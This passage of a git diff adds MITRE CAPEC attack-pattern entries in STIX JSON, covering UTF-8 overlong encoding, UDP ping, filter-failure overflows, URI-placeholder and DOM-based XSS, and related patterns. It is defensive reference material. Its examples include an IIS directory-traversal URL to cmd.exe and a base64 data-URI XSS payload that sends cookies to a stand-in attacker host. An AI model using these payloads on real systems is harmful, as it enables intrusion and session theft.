UTF-8 and submit it to applications not expecting or effective at validating this encoding standard making input filtering difficult. UTF-8 (8-bit UCS/Unicode Transformation Format) is a variable-length character encoding for Unicode. Legal UTF-8 characters are one to four bytes long. However, early version of the UTF-8 specification got some entries wrong (in some cases it permitted overlong characters). UTF-8 encoders are supposed to use the \"shortest possible\" encoding, but naive decoders may accept encodings that are longer than necessary. According to the RFC 3629, a particularly subtle form of this attack can be carried out against a parser which performs security-critical validity checks against the UTF-8 encoded form of its input, but interprets certain illegal octet sequences as characters.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/80.html", + "external_id": "CAPEC-80" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html", + "external_id": "CWE-173" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/172.html", + "external_id": "CWE-172" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/180.html", + "external_id": "CWE-180" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/181.html", + "external_id": "CWE-181" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/171.html", + "external_id": "CWE-171" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/73.html", + "external_id": "CWE-73" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/21.html", + "external_id": "CWE-21" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html", + "external_id": "CWE-74" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html", + "external_id": "CWE-20" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html", + "external_id": "CWE-697" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/692.html", + "external_id": "CWE-692" + }, + { + "source_name": "reference_from_CAPEC", + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1" + }, + { + "source_name": "reference_from_CAPEC", + "description": "David Wheeler, Secure Programming for Linux and Unix HOWTO", + "url": "http://www.dwheeler.com/secure-programs/Secure-Programs-HOWTO/character-encoding.html", + "external_id": "REF-112" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Michael Howard, David LeBlanc, Writing Secure Code, Microsoft Press", + "external_id": "REF-530" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Bruce Schneier, Security Risks of Unicode, Crypto-Gram Newsletter, 2000--07---15", + "url": "https://www.schneier.com/crypto-gram/archives/2000/0715.html", + "external_id": "REF-531" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "url": "http://en.wikipedia.org/wiki/UTF-8", + "external_id": "REF-532" + }, + { + "source_name": "reference_from_CAPEC", + "description": "F. Yergeau, RFC 3629 - UTF-8, a transformation format of ISO 10646, 2003--11", + "url": "http://www.faqs.org/rfcs/rfc3629.html", + "external_id": "REF-533" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Eric Hacker, IDS Evasion with Unicode, 2001--01---03", + "url": "http://www.securityfocus.com/infocus/1232", + "external_id": "REF-114" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Corrigendum #1: UTF-8 Shortest Form, The Unicode Standard, 2001--03, Unicode, Inc.", + "url": "http://www.unicode.org/versions/corrigendum1.html", + "external_id": "REF-535" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Markus Kuhn, UTF-8 and Unicode FAQ for Unix/Linux, 1999--06---04", + "url": "http://www.cl.cam.ac.uk/~mgk25/unicode.html", + "external_id": "REF-525" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Markus Kuhn, UTF-8 decoder capability and stress test, 2003--02---19", + "url": "http://www.cl.cam.ac.uk/%7Emgk25/ucs/examples/UTF-8-test.txt", + "external_id": "REF-537" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Bypass Protection Mechanism" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Unreliable Execution" + ], + "Confidentiality": [ + "Bypass Protection Mechanism", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + "x_capec_example_instances": [ + "\n Perhaps the most famous UTF-8 attack was against unpatched Microsoft Internet Information Server (IIS) 4 and IIS 5 servers. If an attacker made a request that looked like this\n http://servername/scripts/..%c0%af../winnt/system32/ cmd.exe\n the server didn't correctly handle %c0%af in the URL. What do you think %c0%af means? It's 11000000 10101111 in binary; and if it's broken up using the UTF-8 mapping rules, we get this: 11000000 10101111. Therefore, the character is 00000101111, or 0x2F, the slash (/) character! The %c0%af is an invalid UTF-8 representation of the / character. Such an invalid UTF-8 escape is often referred to as an overlong sequence.\n So when the attacker requested the tainted URL, he accessed\n http://servername/scripts/../../winnt/system32/cmd.exe\n In other words, he walked out of the script's virtual directory, which is marked to allow program execution, up to the root and down into the system32 directory, where he could pass commands to the command shell, Cmd.exe.See also: CVE-2000-0884" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The application's UTF-8 decoder accepts and interprets illegal UTF-8 characters or non-shortest format of UTF-8 encoding.", + "Input filtering and validating is not done properly leaving the door open to harmful characters for the target host." + ], + "x_capec_skills_required": { + "Low": "An attacker can inject different representation of a filtered character in UTF-8 format.", + "Medium": "An attacker may craft subtle encoding of input data by using the knowledge that she has gathered about the target host." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--47f60b51-3222-42dd-b08d-ee023ab89afe.json b/capec/attack-pattern/attack-pattern--47f60b51-3222-42dd-b08d-ee023ab89afe.json new file mode 100644 index 0000000000..b10401c875 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--47f60b51-3222-42dd-b08d-ee023ab89afe.json @@ -0,0 +1,80 @@ +{ + "type": "bundle", + "id": "bundle--075f8e75-5d68-4c14-9d15-44514eb967a8", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--47f60b51-3222-42dd-b08d-ee023ab89afe", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "UDP Ping", + "description": "An adversary sends a UDP datagram to the remote host to determine if the host is alive. If a UDP datagram is sent to an open UDP port there is very often no response, so a typical strategy for using a UDP ping is to send the datagram to a random high port on the target. The goal is to solicit an 'ICMP port unreachable' message from the target, indicating that the host is alive. UDP pings are useful because some firewalls are not configured to block UDP datagrams sent to strange or typically unused ports, like ports in the 65K range. Additionally, while some firewalls may filter incoming ICMP, weaknesses in firewall rule-sets may allow certain types of ICMP (host unreachable, port unreachable) which are useful for UDP ping attempts.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/298.html", + "external_id": "CAPEC-298" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html", + "external_id": "CWE-200" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33" + }, + { + "source_name": "reference_from_CAPEC", + "description": "J. Postel, RFC768 - User Datagram Protocol, 1980--08---28", + "url": "http://www.faqs.org/rfcs/rfc768.html", + "external_id": "REF-158" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Mark Wolfgang, Host Discovery with Nmap, 2002--11", + "url": "http://nmap.org/docs/discovery.pdf", + "external_id": "REF-125" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC, ISBN: 978-0-9799587-1-7", + "external_id": "REF-34" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Other", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_prerequisites": [ + "The adversary requires the ability to send a UDP datagram to a remote host and receive a response.", + "The adversary requires the ability to craft custom UDP Packets for use during network reconnaissance.", + "The target's firewall must not be configured to block egress ICMP messages." + ], + "x_capec_resources_required": [ + "UDP pings can be performed via the use of a port scanner or by raw socket manipulation using a scripting or programming language. Packet injection tools are also useful for this purpose. Depending upon the technique used it may also be necessary to sniff the network in order to see the response." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--482b3970-03d2-4537-a2db-09570ed891e7.json b/capec/attack-pattern/attack-pattern--482b3970-03d2-4537-a2db-09570ed891e7.json new file mode 100644 index 0000000000..fc15265f31 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--482b3970-03d2-4537-a2db-09570ed891e7.json @@ -0,0 +1,108 @@ +{ + "type": "bundle", + "id": "bundle--9eac5f33-5d30-4bf1-a228-a305b28740a9", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--482b3970-03d2-4537-a2db-09570ed891e7", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Filter Failure through Buffer Overflow", + "description": "In this attack, the idea is to cause an active filter to fail by causing an oversized transaction. An attacker may try to feed overly long input strings to the program in an attempt to overwhelm the filter (by causing a buffer overflow) and hoping that the filter does not fail securely (i.e. the user input is let into the system unfiltered).", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/24.html", + "external_id": "CAPEC-24" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html", + "external_id": "CWE-120" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html", + "external_id": "CWE-119" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/118.html", + "external_id": "CWE-118" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html", + "external_id": "CWE-74" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html", + "external_id": "CWE-20" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/680.html", + "external_id": "CWE-680" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/733.html", + "external_id": "CWE-733" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html", + "external_id": "CWE-697" + }, + { + "source_name": "reference_from_CAPEC", + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Bypass Protection Mechanism" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Unreliable Execution" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Bypass Protection Mechanism" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_example_instances": [ + "\n Attack Example: Filter Failure in Taylor UUCP Daemon\n Sending in arguments that are too long to cause the filter to fail open is one instantiation of the filter failure attack. The Taylor UUCP daemon is designed to remove hostile arguments before they can be executed. If the arguments are too long, however, the daemon fails to remove them. This leaves the door open for attack.\n ", + "A filter is used by a web application to filter out characters that may allow the input to jump from the data plane to the control plane when data is used in a SQL statement (chaining this attack with the SQL injection attack). Leveraging a buffer overflow the attacker makes the filter fail insecurely and the tainted data is permitted to enter unfiltered into the system, subsequently causing a SQL injection.", + "Audit Truncation and Filters with Buffer Overflow. Sometimes very large transactions can be used to destroy a log file or cause partial logging failures. In this kind of attack, log processing code might be examining a transaction in real-time processing, but the oversized transaction causes a logic branch or an exception of some kind that is trapped. In other words, the transaction is still executed, but the logging or filtering mechanism still fails. This has two consequences, the first being that you can run transactions that are not logged in any way (or perhaps the log entry is completely corrupted). The second consequence is that you might slip through an active filter that otherwise would stop your attack." + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Ability to control the length of data passed to an active filter." + ], + "x_capec_skills_required": { + "High": "Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.", + "Low": "An attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector. The result can be a DoS." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--4859301d-e5f0-40d1-b5ed-976929e27e94.json b/capec/attack-pattern/attack-pattern--4859301d-e5f0-40d1-b5ed-976929e27e94.json new file mode 100644 index 0000000000..390fb0f7da --- /dev/null +++ b/capec/attack-pattern/attack-pattern--4859301d-e5f0-40d1-b5ed-976929e27e94.json @@ -0,0 +1,97 @@ +{ + "type": "bundle", + "id": "bundle--65fc5c4f-5afc-4541-b881-e9889c3f870f", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--4859301d-e5f0-40d1-b5ed-976929e27e94", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "XSS Targeting URI Placeholders", + "description": "An attack of this type exploits the ability of most browsers to interpret \"data\", \"javascript\" or other URI schemes as client-side executable content placeholders. This attack consists of passing a malicious URI in an anchor tag HREF attribute or any other similar attributes in other HTML tags. Such malicious URI contains, for example, a base64 encoded HTML content with an embedded cross-site scripting payload. The attack is executed when the browser interprets the malicious content i.e., for example, when the victim clicks on the malicious link.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/244.html", + "external_id": "CAPEC-244" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/83.html", + "external_id": "CWE-83" + }, + { + "source_name": "reference_from_CAPEC", + "description": "OWASP Testing Guide (v2), The Open Web Application Security Project (OWASP)", + "url": "http://www.owasp.org/index.php/Testing_for_Cross_site_scripting", + "external_id": "REF-70" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Google Cross-Site Scripting HOWTO article, Google", + "url": "https://code.google.com/archive/p/doctype/wikis/ArticleXSSInUrlAttributes.wiki", + "external_id": "REF-96" + }, + { + "source_name": "reference_from_CAPEC", + "description": "OWASP Cheatsheets, The Open Web Application Security Project (OWASP)", + "url": "http://ha.ckers.org/xss.html", + "external_id": "REF-97" + }, + { + "source_name": "reference_from_CAPEC", + "description": "WASC Threat Classification 2.0, 2010, The Web Application Security Consortium (WASC)", + "url": "http://projects.webappsec.org/Cross-Site+Scripting", + "external_id": "REF-72" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Accountability": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ], + "Non-Repudiation": [ + "Gain Privileges" + ] + }, + "x_capec_example_instances": [ + "\n The following payload data:\n text/html;base64,PGh0bWw+PGJvZHk+PHNjcmlwdD52YXIgaW1nID0gbmV3IEltYWdlKCk7IGltZy5zcmMgPSAiaHR0cDovL2F0dGFja2VyLmNvbS9jb29raWVncmFiYmVyPyIrIGVuY29kZVVSSUNvbXBvbmVudChkb2N1bWVudC5jb29raWVzKTs8L3NjcmlwdD48L2JvZHk+PC9odG1sPg==\n represents a base64 encoded HTML and uses the data URI scheme to deliver it to the browser.\n The decoded payload is the following piece of HTML code:\n \n \n \n Web applications that take user controlled inputs and reflect them in URI HTML placeholder without a proper validation are at risk for such an attack.\n An attacker could inject the previous payload that would be placed in a URI placeholder (for example in the anchor tag HREF attribute):\n My Link\n Once the victim clicks on the link, the browser will decode and execute the content from the payload. This will result on the execution of the cross-site scripting attack.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Target client software must allow scripting such as JavaScript and allows executable content delivered using a data URI scheme." + ], + "x_capec_resources_required": [ + "Ability to send HTTP request to a web application" + ], + "x_capec_skills_required": { + "Medium": "To inject the malicious payload in a web page" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--488fb1b8-b703-42c6-a822-c0960ecff6fd.json b/capec/attack-pattern/attack-pattern--488fb1b8-b703-42c6-a822-c0960ecff6fd.json new file mode 100644 index 0000000000..499109ede6 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--488fb1b8-b703-42c6-a822-c0960ecff6fd.json @@ -0,0 +1,93 @@ +{ + "type": "bundle", + "id": "bundle--e6bd59b8-4889-4752-ba3f-7ad0b367c2c8", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--488fb1b8-b703-42c6-a822-c0960ecff6fd", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-04-15T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "DOM-Based XSS", + "description": "This type of attack is a form of Cross-Site Scripting (XSS) where a malicious script is inserted into the client-side HTML being parsed by a web browser. Content served by a vulnerable web application includes script code used to manipulate the Document Object Model (DOM). This script code either does not properly validate input, or does not perform proper output encoding, thus creating an opportunity for an adversary to inject a malicious script launch a XSS attack. A key distinction between other XSS attacks and DOM-based attacks is that in other XSS attacks, the malicious script runs when the vulnerable web page is initially loaded, while a DOM-based attack executes sometime after the page loads. Another distinction of DOM-based attacks is that in some cases, the malicious script is never sent to the vulnerable web server at all. An attack like this is guaranteed to bypass any server-side filtering attempts to protect users.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/588.html", + "external_id": "CAPEC-588" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/79.html", + "external_id": "CWE-79" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html", + "external_id": "CWE-20" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/83.html", + "external_id": "CWE-83" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Amit Klein, DOM Based Cross Site Scripting or XSS of the Third Kind", + "url": "http://www.webappsec.org/projects/articles/071105.shtml", + "external_id": "REF-471" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Jakob Kallin, Irene Lobo Valbuena, A comprehensive tutorial on cross-site scripting", + "url": "https://excess-xss.com/", + "external_id": "REF-472" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges (A successful DOM-based XSS attack can enable an adversary to elevate their privilege level and access functionality they should not otherwise be allowed to access.)" + ], + "Authorization": [ + "Gain Privileges (A successful DOM-based XSS attack can enable an adversary to elevate their privilege level and access functionality they should not otherwise be allowed to access.)" + ], + "Availability": [ + "Execute Unauthorized Commands (A successful DOM-based XSS attack can enable an adversary run arbitrary code of their choosing, thus enabling a complete compromise of the application.)" + ], + "Confidentiality": [ + "Read Data (A successful DOM-based XSS attack can enable an adversary to exfiltrate sensitive information from the application.)", + "Gain Privileges (A successful DOM-based XSS attack can enable an adversary to elevate their privilege level and access functionality they should not otherwise be allowed to access.)", + "Execute Unauthorized Commands (A successful DOM-based XSS attack can enable an adversary run arbitrary code of their choosing, thus enabling a complete compromise of the application.)" + ], + "Integrity": [ + "Execute Unauthorized Commands (A successful DOM-based XSS attack can enable an adversary run arbitrary code of their choosing, thus enabling a complete compromise of the application.)", + "Modify Data (A successful DOM-based XSS attack can allow an adversary to tamper with application data.)" + ] + }, + "x_capec_example_instances": [ + "\n Consider a web application that enables or disables some of the fields of a form on the page via the use of a mode parameter provided on the query string.\n http://my.site.com/aform.html?mode=full\n The application\u2019s client-side code may want to print this mode value to the screen to give the users an understanding of what mode they are in. In this example, JavaScript is used to pull the value from the URL and update the HTML by dynamically manipulating the DOM via a document.write() call.\n \n Notice how the value provided on the URL is used directly with no input validation performed and no output encoding in place. A maliciously crafted URL can thus be formed such that if a victim clicked on the URL, a malicious script would then be executed by the victim\u2019s browser:\n http://my.site.com/aform.html?mode=\n ", + "\n In some DOM-based attacks, the malicious script never gets sent to the web server at all, thus bypassing any server-side protections that might be in place. Consider the previously used web application that displays the mode value. Since the HTML is being generated dynamically through DOM manipulations, a URL fragment (i.e., the part of a URL after the '#' character) can be used.\n http://my.site.com/aform.html#mode=\n In this variation of a DOM-based XSS attack, the malicious script will not be sent to the web server, but will instead be managed by the victim's browser and is still available to the client-side script code.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "An application that leverages a client-side web browser with scripting enabled.", + "An application that manipulates the DOM via client-side scripting.", + "An application that failS to adequately sanitize or encode untrusted input." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Medium": "Requires the ability to write scripts of some complexity and to inject it through user controlled fields in the system." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--48b3fdcc-8514-4c53-bcda-5302b3b71e59.json b/capec/attack-pattern/attack-pattern--48b3fdcc-8514-4c53-bcda-5302b3b71e59.json new file mode 100644 index 0000000000..f9ca68fb12 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--48b3fdcc-8514-4c53-bcda-5302b3b71e59.json @@ -0,0 +1,78 @@ +{ + "type": "bundle", + "id": "bundle--7ab703c5-6e60-4d97-9f3a-3bd68e7ac098", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--48b3fdcc-8514-4c53-bcda-5302b3b71e59", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-12-07T00:00:00.000Z", + "name": "Overflow Binary Resource File", + "description": "An attack of this type exploits a buffer overflow vulnerability in the handling of binary resources. Binary resources may include music files like MP3, image files like JPEG files, and any other binary file. These attacks may pass unnoticed to the client machine through normal usage of files, such as a browser loading a seemingly innocent JPEG file. This can allow the attacker access to the execution stack and execute arbitrary code in the target process. This attack pattern is a variant of standard buffer overflow attacks using an unexpected vector (binary files) to wrap its attack and open up a new attack vector. The attacker is required to either directly serve the binary content to the victim, or place it in a locale like a MP3 sharing application, for the victim to download. The attacker then is notified upon the download or otherwise locates the vulnerability opened up by the buffer overflow.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/44.html", + "external_id": "CAPEC-44" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html", + "external_id": "CWE-120" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html", + "external_id": "CWE-119" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html", + "external_id": "CWE-697" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/713.html", + "external_id": "CWE-713" + }, + { + "source_name": "reference_from_CAPEC", + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_example_instances": [ + "Binary files like music and video files are appended with additional data to cause buffer overflow on target systems. Because these files may be filled with otherwise popular content, the attacker has an excellent vector for wide distribution. There have been numerous cases, for example of malicious screen savers for sports teams that are distributed on the event of the team winning a championship." + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Target software processes binary resource files.", + "Target software contains a buffer overflow vulnerability reachable through input from a user-controllable binary resource file." + ], + "x_capec_skills_required": { + "Medium": "To modify file, deceive client into downloading, locate and exploit remote stack or heap vulnerability" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--48d9833c-513d-416d-a49e-aea8c0bd96d6.json b/capec/attack-pattern/attack-pattern--48d9833c-513d-416d-a49e-aea8c0bd96d6.json new file mode 100644 index 0000000000..bc7a209095 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--48d9833c-513d-416d-a49e-aea8c0bd96d6.json @@ -0,0 +1,29 @@ +{ + "type": "bundle", + "id": "bundle--5b3ae6e6-10bf-4ca1-9562-589eacbf3144", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--48d9833c-513d-416d-a49e-aea8c0bd96d6", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Target Influence via Neuro-Linguistic Programming (NLP)", + "description": "This attack pattern has been deprecated.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/431.html", + "external_id": "CAPEC-431" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--48e13289-5253-4c34-b449-5ba648c378c0.json b/capec/attack-pattern/attack-pattern--48e13289-5253-4c34-b449-5ba648c378c0.json new file mode 100644 index 0000000000..c4bfcf7dc2 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--48e13289-5253-4c34-b449-5ba648c378c0.json @@ -0,0 +1,35 @@ +{ + "type": "bundle", + "id": "bundle--e4cb99a8-334b-4120-a97d-ac84c55b21e4", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--48e13289-5253-4c34-b449-5ba648c378c0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Scheme Squatting", + "description": "An adversary, through a previously installed malicious application, registers for a URL scheme intended for a target application that has not been installed. Thereafter, messages intended for the target application are handled by the malicious application. Upon receiving a message, the malicious application displays a screen that mimics the target application, thereby convincing the user to enter sensitive information. This type of attack is most often used to obtain sensitive information (e.g., credentials) from the user as they think that they are interacting with the intended target application.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/505.html", + "external_id": "CAPEC-505" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Adrienne Porter Felt, David Wagner, Phishing on Mobile Devices, 2011, University of California, Berkeley", + "url": "https://people.eecs.berkeley.edu/~daw/papers/mobphish-w2sp11.pdf", + "external_id": "REF-434" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--492c6870-26aa-408f-a488-379d7a0f87a0.json b/capec/attack-pattern/attack-pattern--492c6870-26aa-408f-a488-379d7a0f87a0.json new file mode 100644 index 0000000000..25a14fa375 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--492c6870-26aa-408f-a488-379d7a0f87a0.json @@ -0,0 +1,36 @@ +{ + "type": "bundle", + "id": "bundle--53abd760-9d5a-4ee5-9660-187b3b544cbe", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--492c6870-26aa-408f-a488-379d7a0f87a0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-12-07T00:00:00.000Z", + "name": "Calling Micro-Services Directly", + "description": "An attacker is able to discover and query Micro-services at a web location and thereby expose the Micro-services to further exploitation by gathering information about their implementation and function. Micro-services in web pages allow portions of a page to connect to the server and update content without needing to cause the entire page to update. This allows user activity to change portions of the page more quickly without causing disruptions elsewhere. However, these micro-services may not be subject to the same level of security review as other forms of content. For example, a micro-service that posts requests to a server that are turned into SQL queries may not adequately protect against SQL-injection attacks. As a result, 